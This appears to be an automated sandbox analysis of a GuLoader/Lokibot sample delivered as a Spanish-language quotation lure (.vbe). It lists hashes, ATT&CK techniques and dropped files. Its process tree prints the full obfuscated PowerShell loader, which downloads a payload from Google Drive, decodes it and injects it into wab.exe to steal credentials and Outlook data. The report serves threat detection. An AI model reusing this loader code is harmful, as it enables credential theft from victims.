guloader | 3731b0bc8e7b933ac2b9c647677f7a2856691c7b70697ccb3f7fe468b4627e28

General

Target

INVITACIÓN A COTIZAR Nueva cervecería NUEVA CERVECERÍA09-09-2024.vbe
Size

25KB
MD5

00e37725a3f758b23993a21b1ccb2d70
SHA1

c37411d16f916077438e9eeecbf6156be34b0530
SHA256

7d7c44eb94e4de1f69917adaeda0b47149ae93a212a6de4defaa865e9669c6ee
SHA512

8764bc8a0b6e4af0d34ec04b9547f6541bb9d57f475af73474f8bc9a4b8a935fba328deac09c7a5a65085f311915f5ebd5fe1a1152ac0cc1b47b59163d9016e5
SSDEEP

384:XkdmF6RYrwIiahDmhp7qr0PG3FLeakT55TGZ45h20aTywD6JbKQxN:XrF6RuhDmv7Boe75FGOhWVguQxN

Score

10^/10

guloader lokibot collection credential_access discovery downloader execution spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2276	powershell.exe
7	2276	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wab.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2276	powershell.exe
2744	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com
10	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2280	wab.exe
2280	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2744	powershell.exe
2280	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2744 set thread context of 2280	2744	powershell.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2276	powershell.exe
2744	powershell.exe
2744	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2744	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	2280	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2984 wrote to memory of 2276	2984	WScript.exe	30
PID 2984 wrote to memory of 2276	2984	WScript.exe	30
PID 2984 wrote to memory of 2276	2984	WScript.exe	30
PID 2276 wrote to memory of 2884	2276	powershell.exe	32
PID 2276 wrote to memory of 2884	2276	powershell.exe	32
PID 2276 wrote to memory of 2884	2276	powershell.exe	32
PID 2276 wrote to memory of 2744	2276	powershell.exe	34
PID 2276 wrote to memory of 2744	2276	powershell.exe	34
PID 2276 wrote to memory of 2744	2276	powershell.exe	34
PID 2276 wrote to memory of 2744	2276	powershell.exe	34
PID 2744 wrote to memory of 1924	2744	powershell.exe	35
PID 2744 wrote to memory of 1924	2744	powershell.exe	35
PID 2744 wrote to memory of 1924	2744	powershell.exe	35
PID 2744 wrote to memory of 1924	2744	powershell.exe	35
PID 2744 wrote to memory of 2280	2744	powershell.exe	36
PID 2744 wrote to memory of 2280	2744	powershell.exe	36
PID 2744 wrote to memory of 2280	2744	powershell.exe	36
PID 2744 wrote to memory of 2280	2744	powershell.exe	36
PID 2744 wrote to memory of 2280	2744	powershell.exe	36
PID 2744 wrote to memory of 2280	2744	powershell.exe	36

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVITACIÓN A COTIZAR Nueva cervecería NUEVA CERVECERÍA09-09-2024.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiopelvimetry='Prenoon';$Homolegalis=${host}.Runspace;If ($Homolegalis) {$Havestuen++;$Radiopelvimetry+='Endocystitis';$Tratterne='su';$Radiopelvimetry+='Undriven';$Tratterne+='bs';$Radiopelvimetry+='Regal';$Tratterne+='tri';$Radiopelvimetry+='Akrostikonet';$Tratterne+='ng';};Function Tennisstjerners($Ceremonialize){$Udryddet=$Ceremonialize.Length-$Havestuen;For( $Tranquilest146=5;$Tranquilest146 -lt $Udryddet;$Tranquilest146+=6){$untranquillise+=$Ceremonialize.$Tratterne.'Invoke'( $Tranquilest146, $Havestuen);}$untranquillise;}function Imdekomnes($Folkevogn169){ & ($Folkebaade255) ($Folkevogn169);}$Lvfldende=Tennisstjerners 'vomerMTi skoD.miczBaretiForedlCudeilInsekacosea/O,ker5 reno.Milie0Diall smert( DaskW ocioisa,dsnGoalpdVolumoMac.rwEm.alsFll.s MonogNInvo.TDespo Staal1Nongr0Nonin..tamp0 bist;Katal Eul WSkarniSuccenDi,es6 Gg.p4Fow.e;Vlskd PentaxDistu6 Gi.g4Locow;Unsco OphtrAreo vfabri:Nocki1 Gast2Kelhe1Dri.n..kspa0Spryd)Helti Ronv,G U.aneGiggecNons.kKonvooFo,si/limma2Unfre0 .nfu1Inden0Trema0 osin1Lunch0S,ids1Kravl Klem.FCursiiSch lrOverleTwopefAnsvaoin.erxSenni/Micro1Genne2Phi,a1 Macr.Respa0 nde ';$Sicking=Tennisstjerners ' Dis USpatis HypeeFortrrTru,h-Prem,A ProggAthl.eProbln.aghjt inds ';$Imminute=Tennisstjerners ' To,dhTypeetPa,potLovmspSourdsHjert:Spill/Ke.fs/SketcdkrekorCait iRygsjv GrupeAkt.o.CointgAntheoFanc,oOpskrgcornelTe steL,erv.HvidmcNglesoEktodm Pres/Unfaru TermcSolve?deleseGirtaxUds,epMeldroWidg,rFejl.tDipte=Godked KnipoUnsegwMoonjnAlderlPutreoClimbaReverd.hugg&OplseiIdr fdJomfr=Picci1Aftern Ap exEncycZLocom-Transa,aburSSem,pkkn cezSoundQb,rneVAfkryfN.ckeh SelvsLicenW HistjMalacI koll Tuf h Angir JydeUFo,keXDermaGRedessFlagllAnaxojNaboi0Defea4UnderDTingsF FriloFerig3 Cat,aHygg. ';$Simplicitetens253=Tennisstjerners 'P.ome>Dalto ';$Folkebaade255=Tennisstjerners '.econiOutcue.onrexSympa ';$bulkskibe='Spisesituationerne';$Sluttish = Tennisstjerners ' Is ge forccSlabbh GldeoInter Pigme% PossaFor upDaasepBe.oedAc,laa haletSsteraTe in%Maski\TransEsensir Synoopinact EnkliStatekDesmieBitear,nchieBroncnTapr,9Requo4Selva.EpidiFMicrooAf odrdiver Aril&Tralu&Ove,c Accoe PeshcSprinh Se toForlo Pent,t.ejek ';Imdekomnes (Tennisstjerners 'Block$DwindgBrdfdlDevicoSkitjbRad,aaMaliglphosp: KbsvEM,nusx Ch.koNe essSta.utKlageo IndtsWeesaiKjortsMonot=Tuber(est acblokpmDe.byd Anpa C noz/BetatcNedsa Snowh$Md,daSPental Non,umarmotPrisetDisseiFr.dnsClojvhparat)nonre ');Imdekomnes (Tennisstjerners 'Chole$Sla egNglell V.ndoGenlsb Reu.ajacanlFundr:A,cepPBeforaJuliolKuldeeForsto ,rdem b.ndaRodknmR,tunm SakeoK rnil.pildo SprigSandeiCattisPeng.taboli= Weft$RearbISammemVolummJ,rnmitraktnSoignu,onextKursuePirat.MedinsHjemfp BestlIslttiMarketHalsk( Pro.$ ForeSDer.liStranmBeardp dagtlKeyb.iPre,hcBeskyiTidsmtDerineUnde.t Rok,eHalsbnKvidrsForha2Extra5Hands3Skank) tori ');Imdekomnes (Tennisstjerners 'Dirt,[,targNTan.aeBrandtRefrn. ,pglSUnca eAntenr Dra.vGigtfiFjerncKrebieOver.P,jerroOrangiFlambnOver.t UndeM sti.a Fjern O doaCrillgforese HimmrMocam]Prel :lgmnd:NeuroSFor ae,kaftc onsuSkvadr Tredi NongtVent yTal oPuldgarg ssio Acest,acypoAfg,acCha.soChlorlGutte Aands=Blund H,sp[arakhNBoghoeChri,tStudi.slagtSSelvteDro pc.rallu SimrrBrysti uartAncreyAnne,P Defer UnmooAfsj.tUrac o Te rcFnaddoAre al Udr T enseyBl.rtpSk atePlati]De,ol: bron:Th.nkT Th.rlPhaeds Knob1 I ch2Yowes ');$Imminute=$Paleomammologist[0];$Hydrotype= (Tennisstjerners 'Tsori$ UndegParoll Fag oSyd,ebGru pa.ennelOmnin:FuldeT gaeto Shouw FdevlI.otoiSmuglnCosheeSc at=SubkuNGr,ekeBaadswChon - BarbO PinkbInfrajAssigeDiu ec Ce,atCetor Sub,iSHemasyFilmisRejnetSaxone DyvomCosi .SkndsNOmplae D metNonan. InteWSkolee.sychbUnsenCTovejlReliviOpg.ve KhitnAllert');$Hydrotype+=$Exostosis[1];Imdekomnes ($Hydrotype);Imdekomnes (Tennisstjerners 'Sags.$UngreTSpundo aagnwHaem.l StraiReattnxyloceSulba.SpermHFa.gseTilstaSkulddexpere,nchyrPl.tysLuref[Wo,ds$ .apiSAlkohiDishecDiasrk.redeiBrillnMoistgFarve]Triio= Pho,$XenopL,elsev,rndefA,dlelTrachd,ealteC.lsinostead ,ulieE kes ');$Assails151=Tennisstjerners 'Bar,a$Knip TLi,psoBa.ubw Lenzl,vstyihudkrnoldypeGross.ZelotDS oryo urdw ,idln.lgenlPoleno PredaLnkendR,speFIndaviConvelToddyeHayfo(M,usi$VedheIFore,m ca,imSpidsiDelinn Gtt uNasopt ShoreAbo e,Tjre $ BuggR hivaBowi,dDuod eCloakrHush e BarorLa.bdeSubsesDtdbl)Nu ri ';$Radereres=$Exostosis[0];Imdekomnes (Tennisstjerners 'Corco$Gama gChirol.altho SamobTildraOverqlOrner:,rnatC Misla rebud DealdReganiSi.htsxylope PededPr,du=Cykel(toothTOprrseHjlpesKvittt urh- LevePSysteaFolketEntithBrass tart$MolyfRLageraOlenid Kapie.nflurLucube ,erdrS rmieMu efsPhot ) Onyc ');while (!$Caddised) {Imdekomnes (Tennisstjerners ' uptu$Ex,isg orbilLucbaovaretbNag,sa EmbelUd pe:CopplNRefleeTolvtgT.opilTe poiKonsogFiaskjUndera Q,ay= park$CentrtirratrvascuuMouthe Ana. ') ;Imdekomnes $Assails151;Imdekomnes (Tennisstjerners 'DehumSEvnert miscaLanderUdrugtBooed- Str,SebolalSa.coe ElekeFundipFejel Ilexe4Rebaw ');Imdekomnes (Tennisstjerners 'Sphin$R ngdg muldlDe,utoTub,rb DentaBrazol tere:UforsCSharnaOocysdC.ofgd .vrvi Stens,haffeMetatd chub= Bnke( Ma aTFiksaeUncensSt,nstUbesv-Po.ycP ejeaSnaddtKar thMin,r Null.$BortfRriddeaVirtud,lamreCandurLivsfeKonderamigae BlresForry)Togol ') ;Imdekomnes (Tennisstjerners '.dsto$SaltkgTiggel ConioOve pbCloseaHeterlDeleg:Ap,stCInfanl SpagiIn tgn uop ihebetdUdbud=Urosc$BlephgDoz,llArbejoSk mlbVeteraRappelRecu :DobbeA eup,f Te.et miscnSted,eDejettSubst+ Rut,+Best,%.alle$KiselP RigsaR.bellPhospeStyreoThingmDenezaDu,semReshomKaloro PromlFlskeoMoonbgFilbeiArsonsisotrtSt.mk. Pro cunt,lo lgjeureamanApplitFredr ') ;$Imminute=$Paleomammologist[$Clinid];}$Reglens=330370;$Tranquilest146somorphisms=29655;Imdekomnes (Tennisstjerners 'S,nen$.ucidgAs molStewpoPiedfb Bo,iaEpithlR,sur:RabatB Labbnaggred TrolsScabelE,cogeOversrHospisInwre Bror= Bast DionyGBelkae.ucomt gaze- nalyC TeetoFlecknStepmtVillae slagncutintHyd.o Prjs$CommuRCond,aVib.adBev,deTrestrDudlee h,verMistre Unwhsleuco ');Imdekomnes (Tennisstjerners 'Hil,o$ iretgSkaftlBr,adoSiderb Val.aKlaeklHeter:AlodiF PlacoreturrAcrottHoba h beliiMo.osn V,vakFrgem une.t= tnke Hepat[TrykkSplansysurfysforsrt Ubehe Sam,mVic,r.PinchCA svaoAut gnTronev turbe TredrInf atIndaz].rkai:Storm:OverrFAartirCartwoUne,tmGrec B melaPuttesAnti.eBosn 6Scher4 ViscSPo ystTil,nrFlseriJaronnFiktigOmbej(Frihe$AnnulBEl.menU vemd ReagsT.baclGrdeseNoncorHypoksMudca)reimp ');Imdekomnes (Tennisstjerners 'b wle$ RudegPoolelHunhuoOprr,b ortyaPilpalSat,l:Pr.plEpret.nXenoprNonvaoThrifbDistaeUnco,dPreci pursi= ,nde Bluer[Unde.SSpeciyIliossS rcatLudbeeTolvamOrnit.StrepT frigeOfficxHe.latRifle.Bal aEleadenT,mpec WranoFestpdSfr ziUnconn UningAfgi,]C.vil:Bo.ts:Ubet,A Uds.SDe.ulCHa vtIHemotISkovb.ContrGPowereLu ttt CheeSristetDisberForgaiAnlgsnPulteg .eva( Tipv$ Ba,kFDei.ooUdh,gr PreatTaknihPianniSupponTeintkSyrn,)Unlin ');Imdekomnes (Tennisstjerners 'Bygni$L.knsgSk nkl.rguso .polbDetekaKaem,lSkyri: BeinKrenitaAfmarrMisacrCulchiUndete Playr odereB nnur KvalnAgateeBegra=Bgebl$Dgnc ELyd,rn.pitorPrivaoUnconbkoi.ceVerd.dMae.e.Ab,rts.nacruincaubBalsasS,adetB cklrAntibiDinnen UsikgUnobl(Prot.$ IndtRDivi.e,nhedgPhi,olEnchiePuzzlnSkinssIodin,L.jek$U,ravTBank.rMalinaBassinE.phoqGaff uDod.ci ,opilIntere.rnits isvatPrism1Augus4S,ire6DepensPlutuoOmarbmSticho Uk,irDesinpTil,uhRetrti Spars vvasmIndrysAnkyl)Per.n ');Imdekomnes $Karriererne;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Erotikeren94.For && echo t"
    3⤵
    PID:2884
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiopelvimetry='Prenoon';$Homolegalis=${host}.Runspace;If ($Homolegalis) {$Havestuen++;$Radiopelvimetry+='Endocystitis';$Tratterne='su';$Radiopelvimetry+='Undriven';$Tratterne+='bs';$Radiopelvimetry+='Regal';$Tratterne+='tri';$Radiopelvimetry+='Akrostikonet';$Tratterne+='ng';};Function Tennisstjerners($Ceremonialize){$Udryddet=$Ceremonialize.Length-$Havestuen;For( $Tranquilest146=5;$Tranquilest146 -lt $Udryddet;$Tranquilest146+=6){$untranquillise+=$Ceremonialize.$Tratterne.'Invoke'( $Tranquilest146, $Havestuen);}$untranquillise;}function Imdekomnes($Folkevogn169){ & ($Folkebaade255) ($Folkevogn169);}$Lvfldende=Tennisstjerners 'vomerMTi skoD.miczBaretiForedlCudeilInsekacosea/O,ker5 reno.Milie0Diall smert( DaskW ocioisa,dsnGoalpdVolumoMac.rwEm.alsFll.s MonogNInvo.TDespo Staal1Nongr0Nonin..tamp0 bist;Katal Eul WSkarniSuccenDi,es6 Gg.p4Fow.e;Vlskd PentaxDistu6 Gi.g4Locow;Unsco OphtrAreo vfabri:Nocki1 Gast2Kelhe1Dri.n..kspa0Spryd)Helti Ronv,G U.aneGiggecNons.kKonvooFo,si/limma2Unfre0 .nfu1Inden0Trema0 osin1Lunch0S,ids1Kravl Klem.FCursiiSch lrOverleTwopefAnsvaoin.erxSenni/Micro1Genne2Phi,a1 Macr.Respa0 nde ';$Sicking=Tennisstjerners ' Dis USpatis HypeeFortrrTru,h-Prem,A ProggAthl.eProbln.aghjt inds ';$Imminute=Tennisstjerners ' To,dhTypeetPa,potLovmspSourdsHjert:Spill/Ke.fs/SketcdkrekorCait iRygsjv GrupeAkt.o.CointgAntheoFanc,oOpskrgcornelTe steL,erv.HvidmcNglesoEktodm Pres/Unfaru TermcSolve?deleseGirtaxUds,epMeldroWidg,rFejl.tDipte=Godked KnipoUnsegwMoonjnAlderlPutreoClimbaReverd.hugg&OplseiIdr fdJomfr=Picci1Aftern Ap exEncycZLocom-Transa,aburSSem,pkkn cezSoundQb,rneVAfkryfN.ckeh SelvsLicenW HistjMalacI koll Tuf h Angir JydeUFo,keXDermaGRedessFlagllAnaxojNaboi0Defea4UnderDTingsF FriloFerig3 Cat,aHygg. ';$Simplicitetens253=Tennisstjerners 'P.ome>Dalto ';$Folkebaade255=Tennisstjerners '.econiOutcue.onrexSympa ';$bulkskibe='Spisesituationerne';$Sluttish = Tennisstjerners ' Is ge forccSlabbh GldeoInter Pigme% PossaFor upDaasepBe.oedAc,laa haletSsteraTe in%Maski\TransEsensir Synoopinact EnkliStatekDesmieBitear,nchieBroncnTapr,9Requo4Selva.EpidiFMicrooAf odrdiver Aril&Tralu&Ove,c Accoe PeshcSprinh Se toForlo Pent,t.ejek ';Imdekomnes (Tennisstjerners 'Block$DwindgBrdfdlDevicoSkitjbRad,aaMaliglphosp: KbsvEM,nusx Ch.koNe essSta.utKlageo IndtsWeesaiKjortsMonot=Tuber(est acblokpmDe.byd Anpa C noz/BetatcNedsa Snowh$Md,daSPental Non,umarmotPrisetDisseiFr.dnsClojvhparat)nonre ');Imdekomnes (Tennisstjerners 'Chole$Sla egNglell V.ndoGenlsb Reu.ajacanlFundr:A,cepPBeforaJuliolKuldeeForsto ,rdem b.ndaRodknmR,tunm SakeoK rnil.pildo SprigSandeiCattisPeng.taboli= Weft$RearbISammemVolummJ,rnmitraktnSoignu,onextKursuePirat.MedinsHjemfp BestlIslttiMarketHalsk( Pro.$ ForeSDer.liStranmBeardp dagtlKeyb.iPre,hcBeskyiTidsmtDerineUnde.t Rok,eHalsbnKvidrsForha2Extra5Hands3Skank) tori ');Imdekomnes (Tennisstjerners 'Dirt,[,targNTan.aeBrandtRefrn. ,pglSUnca eAntenr Dra.vGigtfiFjerncKrebieOver.P,jerroOrangiFlambnOver.t UndeM sti.a Fjern O doaCrillgforese HimmrMocam]Prel :lgmnd:NeuroSFor ae,kaftc onsuSkvadr Tredi NongtVent yTal oPuldgarg ssio Acest,acypoAfg,acCha.soChlorlGutte Aands=Blund H,sp[arakhNBoghoeChri,tStudi.slagtSSelvteDro pc.rallu SimrrBrysti uartAncreyAnne,P Defer UnmooAfsj.tUrac o Te rcFnaddoAre al Udr T enseyBl.rtpSk atePlati]De,ol: bron:Th.nkT Th.rlPhaeds Knob1 I ch2Yowes ');$Imminute=$Paleomammologist[0];$Hydrotype= (Tennisstjerners 'Tsori$ UndegParoll Fag oSyd,ebGru pa.ennelOmnin:FuldeT gaeto Shouw FdevlI.otoiSmuglnCosheeSc at=SubkuNGr,ekeBaadswChon - BarbO PinkbInfrajAssigeDiu ec Ce,atCetor Sub,iSHemasyFilmisRejnetSaxone DyvomCosi .SkndsNOmplae D metNonan. InteWSkolee.sychbUnsenCTovejlReliviOpg.ve KhitnAllert');$Hydrotype+=$Exostosis[1];Imdekomnes ($Hydrotype);Imdekomnes (Tennisstjerners 'Sags.$UngreTSpundo aagnwHaem.l StraiReattnxyloceSulba.SpermHFa.gseTilstaSkulddexpere,nchyrPl.tysLuref[Wo,ds$ .apiSAlkohiDishecDiasrk.redeiBrillnMoistgFarve]Triio= Pho,$XenopL,elsev,rndefA,dlelTrachd,ealteC.lsinostead ,ulieE kes ');$Assails151=Tennisstjerners 'Bar,a$Knip TLi,psoBa.ubw Lenzl,vstyihudkrnoldypeGross.ZelotDS oryo urdw ,idln.lgenlPoleno PredaLnkendR,speFIndaviConvelToddyeHayfo(M,usi$VedheIFore,m ca,imSpidsiDelinn Gtt uNasopt ShoreAbo e,Tjre $ BuggR hivaBowi,dDuod eCloakrHush e BarorLa.bdeSubsesDtdbl)Nu ri ';$Radereres=$Exostosis[0];Imdekomnes (Tennisstjerners 'Corco$Gama gChirol.altho SamobTildraOverqlOrner:,rnatC Misla rebud DealdReganiSi.htsxylope PededPr,du=Cykel(toothTOprrseHjlpesKvittt urh- LevePSysteaFolketEntithBrass tart$MolyfRLageraOlenid Kapie.nflurLucube ,erdrS rmieMu efsPhot ) Onyc ');while (!$Caddised) {Imdekomnes (Tennisstjerners ' uptu$Ex,isg orbilLucbaovaretbNag,sa EmbelUd pe:CopplNRefleeTolvtgT.opilTe poiKonsogFiaskjUndera Q,ay= park$CentrtirratrvascuuMouthe Ana. ') ;Imdekomnes $Assails151;Imdekomnes (Tennisstjerners 'DehumSEvnert miscaLanderUdrugtBooed- Str,SebolalSa.coe ElekeFundipFejel Ilexe4Rebaw ');Imdekomnes (Tennisstjerners 'Sphin$R ngdg muldlDe,utoTub,rb DentaBrazol tere:UforsCSharnaOocysdC.ofgd .vrvi Stens,haffeMetatd chub= Bnke( Ma aTFiksaeUncensSt,nstUbesv-Po.ycP ejeaSnaddtKar thMin,r Null.$BortfRriddeaVirtud,lamreCandurLivsfeKonderamigae BlresForry)Togol ') ;Imdekomnes (Tennisstjerners '.dsto$SaltkgTiggel ConioOve pbCloseaHeterlDeleg:Ap,stCInfanl SpagiIn tgn uop ihebetdUdbud=Urosc$BlephgDoz,llArbejoSk mlbVeteraRappelRecu :DobbeA eup,f Te.et miscnSted,eDejettSubst+ Rut,+Best,%.alle$KiselP RigsaR.bellPhospeStyreoThingmDenezaDu,semReshomKaloro PromlFlskeoMoonbgFilbeiArsonsisotrtSt.mk. Pro cunt,lo lgjeureamanApplitFredr ') ;$Imminute=$Paleomammologist[$Clinid];}$Reglens=330370;$Tranquilest146somorphisms=29655;Imdekomnes (Tennisstjerners 'S,nen$.ucidgAs molStewpoPiedfb Bo,iaEpithlR,sur:RabatB Labbnaggred TrolsScabelE,cogeOversrHospisInwre Bror= Bast DionyGBelkae.ucomt gaze- nalyC TeetoFlecknStepmtVillae slagncutintHyd.o Prjs$CommuRCond,aVib.adBev,deTrestrDudlee h,verMistre Unwhsleuco ');Imdekomnes (Tennisstjerners 'Hil,o$ iretgSkaftlBr,adoSiderb Val.aKlaeklHeter:AlodiF PlacoreturrAcrottHoba h beliiMo.osn V,vakFrgem une.t= tnke Hepat[TrykkSplansysurfysforsrt Ubehe Sam,mVic,r.PinchCA svaoAut gnTronev turbe TredrInf atIndaz].rkai:Storm:OverrFAartirCartwoUne,tmGrec B melaPuttesAnti.eBosn 6Scher4 ViscSPo ystTil,nrFlseriJaronnFiktigOmbej(Frihe$AnnulBEl.menU vemd ReagsT.baclGrdeseNoncorHypoksMudca)reimp ');Imdekomnes (Tennisstjerners 'b wle$ RudegPoolelHunhuoOprr,b ortyaPilpalSat,l:Pr.plEpret.nXenoprNonvaoThrifbDistaeUnco,dPreci pursi= ,nde Bluer[Unde.SSpeciyIliossS rcatLudbeeTolvamOrnit.StrepT frigeOfficxHe.latRifle.Bal aEleadenT,mpec WranoFestpdSfr ziUnconn UningAfgi,]C.vil:Bo.ts:Ubet,A Uds.SDe.ulCHa vtIHemotISkovb.ContrGPowereLu ttt CheeSristetDisberForgaiAnlgsnPulteg .eva( Tipv$ Ba,kFDei.ooUdh,gr PreatTaknihPianniSupponTeintkSyrn,)Unlin ');Imdekomnes (Tennisstjerners 'Bygni$L.knsgSk nkl.rguso .polbDetekaKaem,lSkyri: BeinKrenitaAfmarrMisacrCulchiUndete Playr odereB nnur KvalnAgateeBegra=Bgebl$Dgnc ELyd,rn.pitorPrivaoUnconbkoi.ceVerd.dMae.e.Ab,rts.nacruincaubBalsasS,adetB cklrAntibiDinnen UsikgUnobl(Prot.$ IndtRDivi.e,nhedgPhi,olEnchiePuzzlnSkinssIodin,L.jek$U,ravTBank.rMalinaBassinE.phoqGaff uDod.ci ,opilIntere.rnits isvatPrism1Augus4S,ire6DepensPlutuoOmarbmSticho Uk,irDesinpTil,uhRetrti Spars vvasmIndrysAnkyl)Per.n ');Imdekomnes $Karriererne;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2744
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Erotikeren94.For && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1924
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Accesses Microsoft Outlook profiles
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:2280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Erotikeren94.For

Filesize
468KB

MD5
08bc7c56392625f9419e3fcc8e5e15f8

SHA1
939113f53c8b77721ec04d781c7320d5c2bbf4a5

SHA256
8b6c8459001e80aeaab8e8f354996e078f2b24af6981f5dc34a6092ec75126dc

SHA512
cbe1505c900ffe4985821a9dba3b165ada2e6612671b2c8ea0e06e5fad1bb1385f599224e203d8c4698c491cadddf86b2379e03c5549f441f239b83d6fc2dba4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PHXN2WSWIUAGW2NLWIEN.temp

Filesize
7KB

MD5
0b16bcc7e131a16d45bcc446f4f9a79f

SHA1
e15dbaa107e410daa2298077bef585a26939bd2b

SHA256
2ba3cc9f4a16d8c079d8cf96d756fa7f24735f4a31f125553714daf4a8841cce

SHA512
ddd7ba499398ac5f3f7cd570c1e46ed6b184ce3ee53a42a3324e0f69e8fdf2e831c17d6efba18bf12188d9edccc57900c298d0f614239bcf3a7db9db2d55d223

Download Submit
memory/2276-8-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
memory/2276-4-0x000007FEF4F1E000-0x000007FEF4F1F000-memory.dmp

Filesize
4KB

Download
memory/2276-10-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
